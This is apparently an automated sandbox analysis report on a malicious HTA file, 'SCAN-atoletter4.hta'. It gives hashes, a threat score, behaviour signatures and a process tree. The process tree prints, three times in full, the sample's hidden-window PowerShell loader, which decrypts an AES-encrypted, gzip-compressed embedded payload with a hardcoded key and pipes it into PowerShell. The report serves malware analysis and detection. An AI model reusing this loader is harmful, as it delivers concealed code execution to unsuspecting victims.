Resubmissions

21-01-2025 13:39

250121-qx27kswrck 10

21-01-2025 11:57

250121-n4kvrsskfv 10

21-01-2025 11:43

250121-nvpglaslfq 10

21-01-2025 11:26

250121-njtbea1qcp 10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-01-2025 11:26

General

  • Target

    163.5.169.28/SCAN-atoletter4.hta

  • Size

    1.1MB

  • MD5

    4bde59d84e71c0ff88901e353dbe3eec

  • SHA1

    3000483b2add41716148b8e11fa283f6db6a9cf1

  • SHA256

    992820187d1f871cb816dfb5839c0a71dfde38626d6947b4d912d04cf585454d

  • SHA512

    38a11e2bbba9b26f5651d09f072109cb1b77717c53322a47147e1560016d409c528639be48f2044f038a6b24bad5cf0df200a83ca80c5a27d49fe5b91ecbb0b4

  • SSDEEP

    1536:sSdyqS4pxRNGWLPcX/WhEdbVhtmr/l1vcmafSIm+lIWFXvD+v/j53mD0QMYPhgg9:ldHzpxdPcPWhqxki

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter4.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $SWFMmek = 'AAAAAAAAAAAAAAAAAAAAACrZRvtkqB+SHe0p7lRkPZCNffnqqNClKC3So/ocYip4sIyLwLexWoYN7uQd/Ni71WfNRscuLftSXeNk7UaJGUgjzJYfkZsxtrK18RTQmLCW1pIarAJy+MJgSjZUVMYQWdzwp+win+j10i0G4ZEMS3Xwvcmtwp4oreEie4++NHNNK2xEseGT95QYttS79tMZNR2aXcwdmz1PdnPCFNNhhpyh/taE0Q+6n78bMLTSIE13KTsORNrtCzIgtr3Y0F1MB9lb8eEcPuCw7QaX9ogPRTbwqpZkgv7Y5HUJp0VxDjKql+k0p/kyTsOYemh+qvVkfCSk6ARTZtYYlK+XrkeiPImuz2YM4VwLp2nVNOX6JctQj0eiDB4VQm9iv0T+VU4hA8HLk0q8btV2B0AH8v/kyr25MRM3hDYzSanUXD7xVrSQeftYOypgt7WjJ8vNUUaoRo/O2fOth9pSsJc2PUN5u/1nv/4Qj+WJixqxHp0l9Em2HDhYTsuYx1zddhj9Fjo1g/q5KegORNjsCZpTNiQ8bZ5+3m5h7Ae23py3/VmFOHs+7jARtXTvc5QaAw8PHsDPwSLOKvttyOVKC9nRw5gMdke8E209RPYi+barMiX+Y0P6pDZX47hNfd4uxyY8pnxh1Ysda+Pkk3HMSro15we0nkfamNuIcZ8nJ3XBLA5P/MCMBjuT0W22qHkYVUta9v5eWbqcqW01JrayDLz8V4s/+gKnsbVKwzyoKLtl2cG3vRKpMIzrkc4lxk3l8hOrWqFA4t1Vwx+QeDMmheCrhjT7XLVkej9g76eA9HU2lkuHzolmO0lqP4jtT3xUaKVm5vxJBNDNWGmucLBb42Qvtj/9p4lzILR2oNWO5KzDentXeSmfn7IB+FlXrUi9slXX3mXyPhgx2Fp0HvzP5urbnjmftQaHY1jea7V8sMzWju3VTNpAUYnsOS+P15fXwV7T+C5zvH2sdtqlGPmRZC/xpTwT0CRGhfvZR2OnzvHMZ3Xj1Wi+9A72v/hxGHJ2b1bUvX50vw==';$ketcPRkA = 'U0phVmZDTVVXbkJUdW5GeHZJUFFNamlmTFpJYmtVVkQ=';$MStdDqI = New-Object 'System.Security.Cryptography.AesManaged';$MStdDqI.Mode = [System.Security.Cryptography.CipherMode]::ECB;$MStdDqI.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$MStdDqI.BlockSize = 128;$MStdDqI.KeySize = 256;$MStdDqI.Key = [System.Convert]::FromBase64String($ketcPRkA);$ebtMY = [System.Convert]::FromBase64String($SWFMmek);$tioyoVVE = $ebtMY[0..15];$MStdDqI.IV = $tioyoVVE;$UxxTAdKnB = $MStdDqI.CreateDecryptor();$SnQEJbKME = $UxxTAdKnB.TransformFinalBlock($ebtMY, 16, $ebtMY.Length - 16);$MStdDqI.Dispose();$XYnpOOa = New-Object System.IO.MemoryStream( , $SnQEJbKME );$ZfRyjXCe = New-Object System.IO.MemoryStream;$MHLhPIhJc = New-Object System.IO.Compression.GzipStream $XYnpOOa, ([IO.Compression.CompressionMode]::Decompress);$MHLhPIhJc.CopyTo( $ZfRyjXCe );$MHLhPIhJc.Close();$XYnpOOa.Close();[byte[]] $sLQaEk = $ZfRyjXCe.ToArray();$GdmkIOs = [System.Text.Encoding]::UTF8.GetString($sLQaEk);$GdmkIOs | powershell - }
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $SWFMmek = 'AAAAAAAAAAAAAAAAAAAAACrZRvtkqB+SHe0p7lRkPZCNffnqqNClKC3So/ocYip4sIyLwLexWoYN7uQd/Ni71WfNRscuLftSXeNk7UaJGUgjzJYfkZsxtrK18RTQmLCW1pIarAJy+MJgSjZUVMYQWdzwp+win+j10i0G4ZEMS3Xwvcmtwp4oreEie4++NHNNK2xEseGT95QYttS79tMZNR2aXcwdmz1PdnPCFNNhhpyh/taE0Q+6n78bMLTSIE13KTsORNrtCzIgtr3Y0F1MB9lb8eEcPuCw7QaX9ogPRTbwqpZkgv7Y5HUJp0VxDjKql+k0p/kyTsOYemh+qvVkfCSk6ARTZtYYlK+XrkeiPImuz2YM4VwLp2nVNOX6JctQj0eiDB4VQm9iv0T+VU4hA8HLk0q8btV2B0AH8v/kyr25MRM3hDYzSanUXD7xVrSQeftYOypgt7WjJ8vNUUaoRo/O2fOth9pSsJc2PUN5u/1nv/4Qj+WJixqxHp0l9Em2HDhYTsuYx1zddhj9Fjo1g/q5KegORNjsCZpTNiQ8bZ5+3m5h7Ae23py3/VmFOHs+7jARtXTvc5QaAw8PHsDPwSLOKvttyOVKC9nRw5gMdke8E209RPYi+barMiX+Y0P6pDZX47hNfd4uxyY8pnxh1Ysda+Pkk3HMSro15we0nkfamNuIcZ8nJ3XBLA5P/MCMBjuT0W22qHkYVUta9v5eWbqcqW01JrayDLz8V4s/+gKnsbVKwzyoKLtl2cG3vRKpMIzrkc4lxk3l8hOrWqFA4t1Vwx+QeDMmheCrhjT7XLVkej9g76eA9HU2lkuHzolmO0lqP4jtT3xUaKVm5vxJBNDNWGmucLBb42Qvtj/9p4lzILR2oNWO5KzDentXeSmfn7IB+FlXrUi9slXX3mXyPhgx2Fp0HvzP5urbnjmftQaHY1jea7V8sMzWju3VTNpAUYnsOS+P15fXwV7T+C5zvH2sdtqlGPmRZC/xpTwT0CRGhfvZR2OnzvHMZ3Xj1Wi+9A72v/hxGHJ2b1bUvX50vw==';$ketcPRkA = 'U0phVmZDTVVXbkJUdW5GeHZJUFFNamlmTFpJYmtVVkQ=';$MStdDqI = New-Object 'System.Security.Cryptography.AesManaged';$MStdDqI.Mode = [System.Security.Cryptography.CipherMode]::ECB;$MStdDqI.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$MStdDqI.BlockSize = 128;$MStdDqI.KeySize = 256;$MStdDqI.Key = [System.Convert]::FromBase64String($ketcPRkA);$ebtMY = [System.Convert]::FromBase64String($SWFMmek);$tioyoVVE = $ebtMY[0..15];$MStdDqI.IV = $tioyoVVE;$UxxTAdKnB = $MStdDqI.CreateDecryptor();$SnQEJbKME = $UxxTAdKnB.TransformFinalBlock($ebtMY, 16, $ebtMY.Length - 16);$MStdDqI.Dispose();$XYnpOOa = New-Object System.IO.MemoryStream( , $SnQEJbKME );$ZfRyjXCe = New-Object System.IO.MemoryStream;$MHLhPIhJc = New-Object System.IO.Compression.GzipStream $XYnpOOa, ([IO.Compression.CompressionMode]::Decompress);$MHLhPIhJc.CopyTo( $ZfRyjXCe );$MHLhPIhJc.Close();$XYnpOOa.Close();[byte[]] $sLQaEk = $ZfRyjXCe.ToArray();$GdmkIOs = [System.Text.Encoding]::UTF8.GetString($sLQaEk);$GdmkIOs | powershell -
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:372
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $SWFMmek = 'AAAAAAAAAAAAAAAAAAAAACrZRvtkqB+SHe0p7lRkPZCNffnqqNClKC3So/ocYip4sIyLwLexWoYN7uQd/Ni71WfNRscuLftSXeNk7UaJGUgjzJYfkZsxtrK18RTQmLCW1pIarAJy+MJgSjZUVMYQWdzwp+win+j10i0G4ZEMS3Xwvcmtwp4oreEie4++NHNNK2xEseGT95QYttS79tMZNR2aXcwdmz1PdnPCFNNhhpyh/taE0Q+6n78bMLTSIE13KTsORNrtCzIgtr3Y0F1MB9lb8eEcPuCw7QaX9ogPRTbwqpZkgv7Y5HUJp0VxDjKql+k0p/kyTsOYemh+qvVkfCSk6ARTZtYYlK+XrkeiPImuz2YM4VwLp2nVNOX6JctQj0eiDB4VQm9iv0T+VU4hA8HLk0q8btV2B0AH8v/kyr25MRM3hDYzSanUXD7xVrSQeftYOypgt7WjJ8vNUUaoRo/O2fOth9pSsJc2PUN5u/1nv/4Qj+WJixqxHp0l9Em2HDhYTsuYx1zddhj9Fjo1g/q5KegORNjsCZpTNiQ8bZ5+3m5h7Ae23py3/VmFOHs+7jARtXTvc5QaAw8PHsDPwSLOKvttyOVKC9nRw5gMdke8E209RPYi+barMiX+Y0P6pDZX47hNfd4uxyY8pnxh1Ysda+Pkk3HMSro15we0nkfamNuIcZ8nJ3XBLA5P/MCMBjuT0W22qHkYVUta9v5eWbqcqW01JrayDLz8V4s/+gKnsbVKwzyoKLtl2cG3vRKpMIzrkc4lxk3l8hOrWqFA4t1Vwx+QeDMmheCrhjT7XLVkej9g76eA9HU2lkuHzolmO0lqP4jtT3xUaKVm5vxJBNDNWGmucLBb42Qvtj/9p4lzILR2oNWO5KzDentXeSmfn7IB+FlXrUi9slXX3mXyPhgx2Fp0HvzP5urbnjmftQaHY1jea7V8sMzWju3VTNpAUYnsOS+P15fXwV7T+C5zvH2sdtqlGPmRZC/xpTwT0CRGhfvZR2OnzvHMZ3Xj1Wi+9A72v/hxGHJ2b1bUvX50vw==';$ketcPRkA = 'U0phVmZDTVVXbkJUdW5GeHZJUFFNamlmTFpJYmtVVkQ=';$MStdDqI = New-Object 'System.Security.Cryptography.AesManaged';$MStdDqI.Mode = [System.Security.Cryptography.CipherMode]::ECB;$MStdDqI.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$MStdDqI.BlockSize = 128;$MStdDqI.KeySize = 256;$MStdDqI.Key = [System.Convert]::FromBase64String($ketcPRkA);$ebtMY = [System.Convert]::FromBase64String($SWFMmek);$tioyoVVE = $ebtMY[0..15];$MStdDqI.IV = $tioyoVVE;$UxxTAdKnB = $MStdDqI.CreateDecryptor();$SnQEJbKME = $UxxTAdKnB.TransformFinalBlock($ebtMY, 16, $ebtMY.Length - 16);$MStdDqI.Dispose();$XYnpOOa = New-Object System.IO.MemoryStream( , $SnQEJbKME );$ZfRyjXCe = New-Object System.IO.MemoryStream;$MHLhPIhJc = New-Object System.IO.Compression.GzipStream $XYnpOOa, ([IO.Compression.CompressionMode]::Decompress);$MHLhPIhJc.CopyTo( $ZfRyjXCe );$MHLhPIhJc.Close();$XYnpOOa.Close();[byte[]] $sLQaEk = $ZfRyjXCe.ToArray();$GdmkIOs = [System.Text.Encoding]::UTF8.GetString($sLQaEk);$GdmkIOs
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2768
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2848

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    471344c92a918c6b34b2943001d77274

    SHA1

    2d58538dfd0c57b640df2128e44f746967e988a0

    SHA256

    ecae90ddb1130ff545f403d1333bd921df51933a31fa6eec7a0f993b8c2a0632

    SHA512

    2427047487f5268cc6e31c9f09b35c0ff481ef92448f1760db75cd234a671f5adc2521bc4cf0afc3620385847a3aebf531cad44fa0b10c06d4b224f9b3927ee5

  • memory/2280-2-0x00000000028C0000-0x0000000002900000-memory.dmp

    Filesize

    256KB